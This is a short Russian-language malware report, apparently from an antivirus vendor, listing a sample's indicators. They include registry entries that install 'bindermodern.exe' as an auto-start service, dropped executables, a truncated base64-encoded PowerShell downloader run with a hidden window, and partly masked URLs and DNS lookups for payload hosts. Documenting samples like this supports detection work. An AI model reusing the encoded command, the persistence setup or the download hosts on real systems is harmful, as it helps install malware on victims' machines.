Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\bindermodern] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\bindermodern] 'ImagePath' = '"%WINDIR%\SysWOW64\bindermodern.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHUAYgB3AGQAegBiAGQAPQAnAE0AbwBiAHQAcQB2AGYAdgBzACcAOwAkAEUAeAB4AHoAYQBtAGYAZwBmAGcAZAB4AG0AIAA9AC...
- %HOMEPATH%\284.exe
- %HOMEPATH%\284.exe в %WINDIR%\syswow64\bindermodern.exe
- http://do#####c.sakura.ne.jp/b6o56bjx6p0f4n0kcjry/xAxGdIQ/
- http://www.th###eekpv.com/rss_products/CrJgeM/
- http://st####ts.vlevski.eu/7b13/ZdRfhYjI/
- http://94.##7.253.126/tpt/teapot/ringin/merge/
- DNS ASK do#####c.sakura.ne.jp
- DNS ASK th###eekpv.com
- DNS ASK st####ts.vlevski.eu
- '%HOMEPATH%\284.exe'
- '%WINDIR%\syswow64\bindermodern.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHUAYgB3AGQAegBiAGQAPQAnAE0AbwBiAHQAcQB2AGYAdgBzACcAOwAkAEUAeAB4AHoAYQBtAGYAZwBmAGcAZAB4AG0AIAA9AC...' (со скрытым окном)